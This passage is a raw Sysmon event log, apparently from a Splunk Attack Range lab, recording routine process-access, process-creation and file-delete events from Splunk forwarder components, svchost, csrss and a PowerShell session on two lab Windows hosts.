10341000x8000000000000000809796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.729{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.730{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.698{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C639F0930226BE1CBFAC14671337BF4,SHA256=02B23B0866CE8A620A862916A7AC211213B55D7DD439241B9B8AA690347611B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:27.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFE6DA7072884F8BAFDDC4CB89602ECF,SHA256=8FB81E5ECE15923481B34DBBBF1D173CFBDE2AD163980CC00D61AD1F77287A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.244{0C1E0330-F78B-60EB-CB79-00000000D001}23163828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:27.057{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.041{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.042{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=114F6EF6AEF8B91F2C43E3A8E4DA7481,SHA256=F8CC2819E3BE764A05358A72FBD13937F3373382F042AA5C83AAE74F1611F523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:28.870{466BC892-F786-60EB-CA7D-00000000CF01}9508ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:28.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5EE5C83B9D39D2BDFE972EC0998245,SHA256=5D414C646D670A0985D49FCB5CCAB3E0171F506D22601D5EF146444FD931AFC3,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000809820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.588{0C1E0330-F78C-60EB-CD79-00000000D001}38563108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.448{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
